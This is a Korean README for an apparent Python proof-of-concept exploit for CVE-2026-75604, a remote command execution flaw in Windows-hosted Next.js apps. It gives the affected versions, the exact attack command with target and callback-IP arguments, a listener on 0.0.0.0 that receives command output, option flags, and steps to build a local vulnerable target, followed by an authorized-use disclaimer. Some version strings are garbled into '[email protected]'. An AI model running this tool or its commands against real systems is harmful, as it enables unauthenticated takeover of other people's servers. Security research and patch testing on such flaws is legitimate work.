
CVE-2026-75604에 대한 개념 증명 익스플로잇으로, Windows에서 호스팅되는 Next.js 앱의 인증되지 않은 원격 코드 실행 취약점이며, 콜백 기반 명령 실행 및 로컬 대상 설정을 포함합니다.
CVE-2026-75604에 대한 Python 개념 증명(PoC)으로, Windows 호스트 Next.js 애플리케이션에서 Cache Components 없이 Pages Router와 App Router를 모두 사용하는 경우 발생하는 인증되지 않은 원격 명령 실행 취약점입니다.

>=13.4 <15.5.24 또는 >=16.0 <16.3.3[email protected]로 검증되었습니다.
python -m pip install -r requirements.txt
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
Server Action 경로는 기본적으로 /입니다. 폼에 필드가 두 개 이상인 경우 --action-field를 사용하세요.
필수 인자:
--target URL: Next.js 애플리케이션의 기본 URL--callback-ip ADDRESS: 대상에서 접근 가능한 IPv4 주소--pages-cache-path PATH: 기존 동적 Pages Router ISR 페이지--app-cache-path PATH: 파일시스템 캐시로 백업된 기존 동적 App Router 페이지선택 인자:
--command COMMAND: 실행할 명령어; 기본값은 whoami--action-path PATH: 호환되는 Server Action이 포함된 App Router 페이지; 기본값은 /--action-field NAME: 액션이 사용하는 폼 필드; 모호하지 않은 경우 자동 감지--callback-port PORT: 콜백 포트; 기본값은 4331--listen-address ADDRESS: 로컬 콜백 바인드 주소; 기본값은 0.0.0.0--timeout SECONDS: 요청 및 콜백 타임아웃; 기본값은 20--insecure: TLS 인증서 검증 비활성화선택 사항인 target/ 애플리케이션은 [email protected]을 고정하고 표준 Next.js 프로덕션 서버를 사용합니다:
cd target
npm ci
npm run build
npm start
다른 터미널에서 PoC를 실행하세요:
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
선택 사항인 대상은 /에 필요한 라우트와 호환되는 Server Action을 제공합니다.
이 PoC는 교육 목적, 보안 연구 및 승인된 테스트 전용으로 제공됩니다. 소유한 시스템 또는 명시적 테스트 권한이 있는 시스템에서만 사용하세요.
evolutionstorm에게 크레딧을 제공합니다.
이 PoC는 공개 권고 및 Next.js 패치에서 독립적으로 재구성되었습니다.